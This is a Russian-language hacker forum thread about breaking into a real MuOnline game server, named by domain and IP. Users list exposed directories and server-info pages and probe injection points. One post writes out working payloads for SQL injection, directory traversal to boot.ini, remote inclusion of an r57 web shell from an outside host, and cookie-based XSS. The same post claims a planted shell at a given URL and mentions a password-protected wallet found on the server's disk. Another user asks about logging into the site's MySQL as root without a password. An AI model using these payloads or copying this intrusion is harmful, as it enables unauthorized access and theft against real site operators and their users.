Это йгровой сервер игры MuOnline я эго пытался ломануть ничего не вышло вобщем забил на него

__tp://85.115.112.18/main_inc/lang.php

__tp://85.115.112.18/server-info

http://mu.partylife.lv/index.php?pg=adm еще одно раскрытие

EST a1ien, тоже MuOnline увлекаешься =) Я просто MuOnline люблю исследовать, потомучто не умею запросами выбивать названия таблиц, а так всё зарание знаю =)

Зкажите почему XSpider выдаёт SQL Inject Я лично его там невижу!

Хмм... Интересно... Если вписать %27 то он его не фильтрует, но и нет ошибки =(
А если так, фильтрует http://mu.partylife.lv/index.php?pg=lang&lg=ru%27

И раз уж все дружно ищем кривой php =) То вот
http://mu.partylife.lv/index.php?pg=lang&lg=ru
И естествено
http://mu.partylife.lv/index.php?pg=lang&lg=en

Ещё кое-что... Не уязвимость, но понятно сколько их там =) Защёл в любую папку! http://mu.partylife.lv/user_images/ Посмотрел HTML
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://mu.partylife.lv/">
По моему не хватает пару " Ну кто так делает... Что за админ там...

У меня ещё вопрос... Можно-ли как-то подконнектиться к ихней MySQL... Судя по сайту у них там скорей всего root без пароля, серверный адресс мы знаем =) Можно попытаться, но только если есть такое чудо, как "Подключение к чужой MySQL"

<offtopic>
Нда... Может я заслужил свою репутацию -4! Даже тему немогу создать там где надо! Перенесите плиз
Форум АНТИЧАТ > ОФФТОП > Болталка > Развлечения > On-line игры и другие. Уязвимости. Коды.
</offtopic>

Вот ещё немного папок!
http://mu.partylife.lv/downloads/
http://mu.partylife.lv/index/
http://mu.partylife.lv/login/
http://mu.partylife.lv/logout/
http://mu.partylife.lv/server-status/ - Интересно...
http://mu.partylife.lv/server-info/ - Оч интересно...
http://mu.partylife.lv/src/
http://mu.partylife.lv/stats/
http://mu.partylife.lv/video/
http://mu.partylife.lv/includes/
http://mu.partylife.lv/img/
http://mu.partylife.lv/menu/
http://mu.partylife.lv/img/misc/
Многие из них бесполезны! Но меня оч заинтересовало /server-info/

Вопервых там стоит винда во вторых MSSQL
а в третьих _http://mu.partylife.lv/index.php?pg=lang&lg=ru здесь нету как я понял запроса к базе а просто идет через case

О, кстати, я тут собираюсь исходники MuOnline на баги тестить Version=0.97.04 У кого есть какие-либо наработки по этой версии?

1ten0.0net1, у меня есть 97 сервак с Castle Siege, Chaos Castle тама все порты переделаны, на нём не идёт Hack Speed, MuPie и много другой читерской фигни! Вот такой вот 97... Жестоко его переделали!

2 Ponchik Я этой дрянбю интересуюсь исключительно в технических целях, а не игровых.

А вот есть там SQL injection! И еще Directory traversal, File inclusion и Cross Site Scripting. И все это в cookies, в параметре lang и в char. char=' ; lang=../../../../../../../../boot.ini ; lang=http://site.ru/r57.php ; lang=><script>alert(/ok/)</script>. Тут - http://85.115.112.18/inc.php r57shell =)

На диске d:\lol валяется webmoney с паролем. Мой кошелек - Z305549227839 если что8).

Shell удалил, так как уже один есть.

__________________

Завтра будет.Лучше.